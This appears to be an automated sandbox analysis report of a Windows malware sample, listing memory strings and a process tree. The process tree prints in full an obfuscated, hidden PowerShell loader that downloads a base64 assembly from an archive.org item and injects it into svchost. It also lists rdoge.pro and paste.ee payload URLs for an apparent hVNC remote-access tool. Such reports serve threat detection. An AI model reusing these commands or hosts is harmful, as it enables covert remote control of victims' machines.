Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC8612E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ia600100.us.archive.org |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1728472486.000001AF28D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021701963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://paste.ee |
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000010.00000002.3144999713.000001C515986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84A94000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000001E.00000002.1704147920.000001EC82C09000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000010.00000002.3144999713.000001C51593D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6 |
Source: powershell.exe, 00000010.00000002.3144999713.000001C515959000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84A94000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://analytics.paste.ee |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://analytics.paste.ee; |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdnjs.cloudflare.com |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdnjs.cloudflare.com; |
Source: powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fonts.googleapis.com |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fonts.gstatic.com; |
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF19678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.000002170118C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC8540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A393000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ia600100.us.arX |
Source: powershell.exe, 00000018.00000002.1667045038.000002170169D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ia600100.us.arXj |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.000002170169D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC860A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ia600100.us.archive.org |
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF18F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtZHo;NrXbase64Content |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1728472486.000001AF28D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021701963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://paste.ee |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84E93000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://paste.ee/d/82O7E/0 |
Source: TM3utH2CsU.exe, 00000000.00000003.1379876457.000002069462F000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000002.1730832059.00000206945BC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/nd/eneba_com_privacy_policy.pdf |
Source: TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: https://rdoge.pro/nd/eneba_com_privacy_policy.pdfFailed |
Source: TM3utH2CsU.exe, 00000000.00000002.1730832059.00000206945BC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/nd/eneba_com_privacy_policy.pdfO |
Source: TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.zip |
Source: TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.zipf4 |
Source: TM3utH2CsU.exe, 00000000.00000002.1745075290.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp, TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.ziphttps://rdoge.pro/stc/wm_startup.ziphttps://rdoge.pro/stc/pure_h |
Source: TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.zipo4 |
Source: TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/pure_hnvc2.zip |
Source: TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/pure_hnvc2.zip049p |
Source: TM3utH2CsU.exe, 00000000.00000003.1436659897.000002069462F000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/wm_startup.zip |
Source: TM3utH2CsU.exe, 00000000.00000003.1436659897.000002069462F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://rdoge.pro/stc/wm_startup.zipf4 |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://secure.gravatar.com |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://themes.googleusercontent.com |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com; |
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Process created: C:\Users\user\Desktop\TM3utH2CsU.exe "C:\Users\user\Desktop\TM3utH2CsU.exe" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf" |
|
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 |
|
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
